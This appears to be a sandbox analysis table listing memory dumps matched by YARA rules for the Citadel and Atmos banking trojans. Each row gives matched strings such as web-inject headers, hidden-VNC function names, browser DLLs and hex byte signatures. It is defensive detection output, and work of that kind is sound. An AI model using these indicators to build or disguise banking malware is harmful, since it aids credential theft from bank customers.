00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000023.00000002.2966547595.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000023.00000002.2966547595.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000023.00000002.2966547595.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000023.00000002.2966547595.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 9A 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 9A 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 9A 00
00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 19 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 19 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 19 00
00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 19 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 19 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 19 00
00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 F1 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 F1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 F1 00
00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AB 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AB 00
0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A9 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A9 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A9 00
0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 01 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 01 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 01 00
00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001E.00000002.2968177291.0000000002990000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001E.00000002.2968177291.0000000002990000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001E.00000002.2968177291.0000000002990000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001E.00000002.2968177291.0000000002990000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 FB 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 FB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 FB 00
00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
